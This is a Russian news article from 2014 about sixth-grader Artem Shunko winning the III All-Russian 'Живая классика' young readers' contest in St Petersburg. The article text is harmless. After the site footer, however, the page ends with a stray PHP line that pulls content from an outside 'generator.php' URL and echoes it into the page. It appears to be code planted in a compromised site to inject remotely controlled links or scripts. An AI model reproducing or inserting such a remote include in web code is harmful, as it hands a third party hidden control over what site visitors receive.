Регистрация нового пользоателя


Аллея Здоровья
Аллея Здоровья
Артем Шунько, шестиклассник школы № 9 - победитель III Всероссийского конкурса юных чтецов «Живая классика», который прошел в Санкт-Петербурге

2014-05-28 11:25:35
Артем Шунько, шестиклассник школы № 9 - победитель III Всероссийского конкурса юных чтецов «Живая классика», который прошел в Санкт-Петербурге

Победителем III Всероссийского конкурса юных чтецов «Живая классика», который прошел накануне в Петербурге, стал шестиклассник из города Ирбита Свердловской области Артем Шунько. 6 июня в Москве он будет представлять нашу страну на международном этапе конкурса

 

Артем Шунько так эмоционально и артистично прочел рассказ Виктора Драгунского «Слава Ивана Козловского», что ни зрители, ни жюри, в котором, к слову, председательствовал народный артист России Михаил Боярский, не смогли удержаться от смеха.

Всего в Большом финале Всероссийского этапа «Живой классики» в этом году принимали участие 23 шестиклассника.

Артем рассказал OK-inform, что с детства любит выступать на сцене и занимается в театральном коллективе.

- Когда мне предложили участвовать в «Живой классике», я сразу согласился. Мне сказали, что надо выбрать для чтения трагедию либо юмористический рассказ. Я выбрал юмор, потому что считаю, что лучше человека смешить, чем огорчать, - говорит победитель III Всероссийского конкурса юных чтецов «Живая классика».

Учителя предложили Артему на выбор три юмористических рассказа. Среди них был «Слава Ивана Козловского» Виктора Драгунского.

- Я выбрал это произведение, потому что ассоциирую себя с его главным героем, - объяснил шестиклассник из Свердловской области.

А вообще больше, чем читать, он любит слушать и рассказывать. А еще сам пишет книгу.

Всего же в Большом финале Всероссийского этапа «Живой классики» в этом году принимали участие 23 шестиклассника - из Москвы, Петербурга, Архангельской, Брянской, Калужской, Нижегородской, Новгородской, Московской, Ростовской, Свердловской, Тамбовской, Тверской, Томской, Тюменской и Ульяновской областей, Краснодарского, Красноярского и Пермского краев, а также Республик Адыгея, Бурятия и Хакасия.Все они выступали перед огромным залом и компетентным жюри на сцене Академического театра комедии им. Н. П. Акимова.

Этих «суперфиналистов», как их назвала ведущая конкурса и бессменный член жюри «Живой классики» журналист и телеведущая Светлана Сорокина, выбрали из 255 ребят, прошедших отбор в 85 регионах России, в том числе в Крыму и Севастополе.

- Этот конкурс - самый массовый среди школьников 11-12 лет, - отметила Светлана Сорокина. - В этом году в нем приняли участие почти 2,5 млн ребят. И все 255 финалистов - уже победители. В качестве подарка они получили поездку в Петербург.

А все участники Большого финала, который состоялся 26 мая в Театре комедии Акимова, были награждены путевками в лагерь «Орленок». А лучшие из лучших - еще и наборами гаджетов от спонсоров.

                                                                                                                           Сайт: ОК-ИНФОРМ.РУ
 




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>